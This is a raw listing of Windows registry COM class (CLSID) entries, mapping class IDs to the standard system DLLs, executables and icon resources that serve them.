%SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3AC83423-3112-4AA6-9B5B-1FEB23D0C5F9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-50176 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA} Infotip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-12688 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-113 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3B1599F9-E00A-4BBF-AD3E-B3F99FA87779}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3b176793-1c28-467d-bf13-ff0ac689e18b}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eapsimextdesktop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3B17FD9C-F7CF-4736-AF6B-616C2D1ED854}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\activationmanager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3B1B5147-715E-49e0-AE9F-ADF86724BB89}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3B269952-C2CE-40CC-BB36-94858E0A7CD4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3B2B6775-70B6-45AF-8DEA-A209C69559F3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3B873591-9427-4418-A086-79175735738F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\smbwmiv2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3bb4118f-ddfd-4d30-a348-9fb5d6bf1afe}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3BB46AD9-4D42-4EC6-B96B-68973FCD26F1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3BBE95A4-C53F-11d1-B3A2-00A0C9083365}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3BBE95DA-C53F-11d1-B3A2-00A0C9083365}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3BBE95F5-C53F-11d1-B3A2-00A0C9083365}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3BBE95FB-C53F-11d1-B3A2-00A0C9083365}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3BBE95FE-C53F-11d1-B3A2-00A0C9083365}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3BEE4890-4FE9-4A37-8C1E-5E7E12791C1F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3BF043EF-A974-49B3-8322-B853CF1E5EC5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SndVolSSO.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3bfe6eb7-281d-4333-999e-e949e3621de7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rastlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3c2654c6-7372-4f6b-b310-55d6128f49d2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3C296D07-90AE-4FAC-86F9-65EAA8B82D22}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SppExtComObj.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3C305196-50DB-11D3-9CFE-00C04FD930C5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ddraw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3C4059B0-FB29-4EBA-9947-289E0D824E64}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3C4512DC-AEFA-4a1e-95CF-EDF896092447}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3c5edebe-16c6-4ee4-906b-436aa1f6ef9e}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinapi.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3C5F432A-EF40-4669-9974-9671D4FC2E12}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3C852D74-7E49-4FF3-BF21-81EF888078D4}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mpeval.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3C925F4E-F236-4BCF-9330-F15B8AD8765B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3CCF8A41-5C85-11d0-9796-00AA00B90ADF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3CE74DE4-53D3-4D74-8B83-431B3828BA53}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msctf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3D112E22-62B2-11D1-9FEF-00600832DB4A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3d154a2d-d911-437e-a30c-5f56a9b7081d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3D813DFE-6C91-4A4E-8F41-04346A841D9C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3dad6c5d-2167-4cae-9914-f99e41c12cfa}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3DBFEF35-6F15-4453-BC19-D7AD5CC04756}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3DC09436-7D83-4BA0-ADDC-CD47F996C5BA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3DC7A020-0ACD-11CF-A9BB-00AA004AE837}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3dd6bec0-8193-4ffe-ae25-e08e39ea4063}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\credprovs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3DD82D10-E6F1-11D2-B139-00105A1F77A1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\cimwin32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3df11260-58db-46ca-85ee-35459e115b9c}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eappcfgui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de} Infotip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-12689 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E000D72-A845-4CD9-BD83-80C07C3B881F} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\cmlua.dll,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E000D72-A845-4CD9-BD83-80C07C3B881F}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\cmlua.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E000D72-A845-4CD9-BD83-80C07C3B881F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmlua.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E4D4F1C-2AEE-11D1-9D3D-00C04FC30DF6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\oleprn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\cmstplua.dll,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\cmstplua.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmstplua.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E6147C9-902B-48BA-B1B8-5B1FFD874FB2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3E784A01-F3AE-4DC0-9354-9526B9370EBA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3EA48300-8CF6-101B-84FB-666CCB9BCD32}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\docprop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3EC569DC-6FB5-45D1-8B46-E122D27962E9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CoreUIComponents.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3eef301f-b596-4c0b-bd92-013beafce793}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F13AB10-AE95-48AA-8C94-533730760A20}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\pmcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F30C968-480A-4C6C-862D-EFC0897BB84B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PhotoMetadataHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3f454f0e-42ae-4d7c-8ea3-328250d6e272}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F66389B-BA65-4782-BA9D-B66367C8E7F1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\powercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F66CF3F-68BE-485e-8BFE-0A005B2D00F2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\appwiz.cpl,-191 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\appwiz.cpl,-190 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\rstrui.exe,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rstrui.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F9A55B0-8355-4CE4-B6D6-A65CAC63DB67}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CellularAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F9FF9AB-AC3E-40BB-BBC9-27B648AD1FB2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\XboxGipRadioManager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3FBA60A6-7BF5-4868-A2CA-6623B3DFFEA6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3FC0B520-68A9-11D0-8D77-00C04FD70822}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3fd7f233-a716-472e-8f2f-c25954f34e96}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3FF566F0-6E6B-49D4-96E6-B78886692C62}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3FFB3B8C-EB99-472b-8902-E1C1B05F07CF}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfnetcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4000C97B-791B-425F-9AD6-5046210503B1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4026492F-2F69-46B8-B9BF-5654FC07E423}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4026492F-2F69-46B8-B9BF-5654FC07E423}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\FirewallControlPanel.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40319fab-cc2f-4cea-890c-1e676b139824}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40419485-C444-4567-851A-2DD7BFA1684D} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\telephon.cpl,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\telephon.cpl,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40419485-C444-4567-851A-2DD7BFA1684D}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\telephon.cpl,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40419485-C444-4567-851A-2DD7BFA1684D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\telephon.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4057C1AD-A51F-40BB-B960-22888CEB9812}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\domgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{405EC9AB-0C64-4B9F-B726-3A858A9E2BD6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4082B93D-99AF-4E6F-BE9F-6AA54C0BC6BE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40871C59-AB40-471F-8DC3-1F259D862479}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmpeg2srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40AFA0B6-3B2F-4654-8C3F-161DE85CF80E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\IDStore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40B47A8F-C442-4f06-8304-AA1058EDEEA0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\POSyncServices.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40B6664F-4972-11D1-A7CA-0000F87571E3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\scrptadm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40B66650-4972-11D1-A7CA-0000F87571E3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\scrptadm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40B66660-4972-11D1-A7CA-0000F87571E3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\scrptadm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40B66661-4972-11D1-A7CA-0000F87571E3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\scrptadm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40b8879a-9b26-42fd-8fec-00c32f8443be}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CapabilityAccessHandlers.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40dd6e20-7c17-11ce-a804-00aa003ca9f6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41070793-59E4-479A-A1F7-954ADC2EF5FC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4125dd96-e03a-4103-8f70-e0597d803b9c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41457294-644C-4298-A28A-BD69F2C0CF3B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfasfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{418c8b64-5463-461d-88e0-75e2afa3c6fa}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{418DFBFA-4DE8-41C0-A272-727307252DBD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41937347-2aba-4d4c-a4ca-6fe4f11f1bac}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\NetworkItemFactory.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41945702-8302-44A6-9445-AC98E8AFA086}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\MSRAWImage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41B89B6B-9399-11D2-9623-00C04F8EE628}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41B9BE05-B3AF-460C-BF0B-2CDD44A093B1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\xmlfilter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41CA099A-B8AF-4fc2-A285-03FAEAA8B109}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41E300E0-78B6-11ce-849B-444553540000}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{41FCCC3A-1FA1-4949-953A-6EE61C46A4D1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42044394-8c34-11d1-83bc-00c04fbbc34e}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\colbact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42060D27-CA53-41f5-96E4-B1E8169308A6}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\RacEngn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42071712-76d4-11d1-8b24-00a0c9068ff3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\deskadp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42071713-76d4-11d1-8b24-00a0c9068ff3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\deskmon.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42281387-EDEA-477C-89DB-6F7033D518AB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42393E99-8513-42d3-8AEA-E0E5FBDC8F64}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{424bed78-ef88-4b7c-945c-b8cf46d56e20}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\credprovhost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4278BB8C-D0FC-4380-A2C4-525B9A396F5B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{427BC7E3-F833-4584-8745-CFAB9D7A5761}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4290CAD6-A75D-4AC8-A496-56DBBB28EB88}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42C9B9F5-16FC-47ef-AF22-DA05F7C842E3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42D69529-136E-49D6-8407-3026853038BF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\pmcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42FEBF74-65EA-4D27-B3AC-86393B6AFAE1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{430da762-8632-4840-bc61-3eeaa078e62e}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\display.dll,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{430da762-8632-4840-bc61-3eeaa078e62e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\display.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{43136EB5-D36C-11CF-ADBC-00AA00A80033}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{43324B33-A78F-480F-9111-9638AACCC832}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4333fd20-ca5f-4095-a535-edb00455ce66}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-9113 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4347F4C2-6A7D-40DF-9A4F-C185317AF183}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{434A6274-C539-4E99-88FC-44206D942775} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\AccessibilityCpl.dll,-6000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{434A6274-C539-4E99-88FC-44206D942775}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AccessibilityCpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{435899C9-44AB-11D1-AF00-080036234103}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\oleprn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{437ff9c0-a07f-4fa0-af80-84b6c6440a16}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{43A1BB0E-2CE9-405C-8799-12E7D7550D3F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{43C103A6-696F-4D05-AF04-9E44A6844B30}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{43D7FDB4-B94D-4415-8792-54AF9FBEBB82}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wbem\netttcim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4405b37b-60fe-49ed-ba8f-691a78f84daf}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\colbact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{442FF639-3DA0-4A70-A1D8-579E26C46A60}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\PSModuleDiscoveryProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{443E7B79-DE31-11D2-B340-00104BCC4B4A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{444F7305-1D7D-4BE9-8C29-CC3F1D220C40}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll 